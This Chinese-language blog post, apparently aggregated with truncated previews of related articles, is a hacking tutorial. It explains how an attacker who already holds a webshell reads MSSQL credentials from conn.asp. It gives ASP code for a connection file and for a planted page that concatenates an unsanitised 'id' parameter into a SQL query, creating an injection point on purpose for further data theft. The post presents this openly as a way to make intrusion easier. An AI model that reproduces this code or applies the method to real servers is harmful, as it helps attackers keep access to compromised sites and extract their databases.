自己偽造注入點方便滲透

2021-12-29 16:38:01 字數 1234 閱讀 4721

今天看了rootkit論壇裡面有人要我寫出來關於偽造乙個注入點,然後方便滲透,找到更多的可利用的資訊

這兩天一直考試,想了下,就先仍出來,有什麼問題可以提出來,我們一起討論!

首先你要拿了乙個webshell,這樣你找到連線資料庫的檔案,大多都是conn.asp這個檔案裡面有mssql的使用者和

密碼,你要找到使用者名稱、密碼、資料庫所在的ip,然後連線上去,至於連線大家應該都會,找到**管理員的表

因為我測試的時候是用管理員的表,我朋友說任何表名都可以,只要這個表存在,**如下:

程式**

set rs=server.createobject("adodb.recordset")

id = request("id")

strsql = "select * from admin where id=" & id

rs.open strsql,conn,1,3

rs.close

%>

把strsql = "select * from admin where id=" & id 這句話裡面的admin換成要偽造的表名,注意必須存在

你可以連線上去看下表名就是了!這裡假設的是admin是表名!這個檔名隨便儲存!

然後就要構造乙個連線資料庫的檔案了,**如下:

程式**

strsqlservername = "000.000.000.000"     伺服器名稱或位址

strsqldbusername = "sqlname"         資料庫帳號

strsqldbpassword = "sqlpass"         資料庫密碼

strsqldbname = "sqldataname"           資料庫名稱

set conn = server.createobject("adodb.connection")

strcon = "provider=sqloledb.1;persist security info=false;server=" & strsqlservername & ";user id=" & strsqldbusername & ";password=" & strsqldbpassword & ";database=" & strsqldbname & ";"

conn.open strcon

%>

這裡應該都會了,就不羅嗦了,不過注意的是儲存的檔名要和include呼叫的名字一樣。。還是羅嗦話,

就這樣,正常情況下,就ok了,偽造成功……

自己構造注入點

一種是通過conn.asp獲知資料庫帳戶密碼以後 自己構造,另乙個是通過搜尋檢視源 構造注入點。第一種 適用條件 已經獲得 的資料庫鏈結檔案,但不是sa許可權 當然如果是mdb資料庫那就很簡單了,直接下下來就ok了,這裡只是針對mssql資料庫而言 由於入侵 並沒有注入漏洞所以,無法注入,但是我們可...

自己構造注入點方便入侵

自己構造注入點方便入侵 今天看了rootkit論壇裡面有人要我寫出來關於偽造乙個注入點,然後方便滲透,找到更多的可利用的資訊 這兩天一直考試,想了下,就先仍出來,有什麼問題可以提出來,我們一起討論!首先你要拿了乙個webshell,這樣你找到連線資料庫的檔案,大多都是conn.asp這個檔案裡面有m...

自己構造注入點方便入侵

首先你要拿了乙個webshell,這樣你找到連線資料庫的檔案,大多都是conn.asp這個檔案裡面有mssql的使用者和 因為我測試的時候是用管理員的表,我朋友說任何表名都可以,只要這個表存在,如下 程式 set rs server.createobject adodb.recordset id r...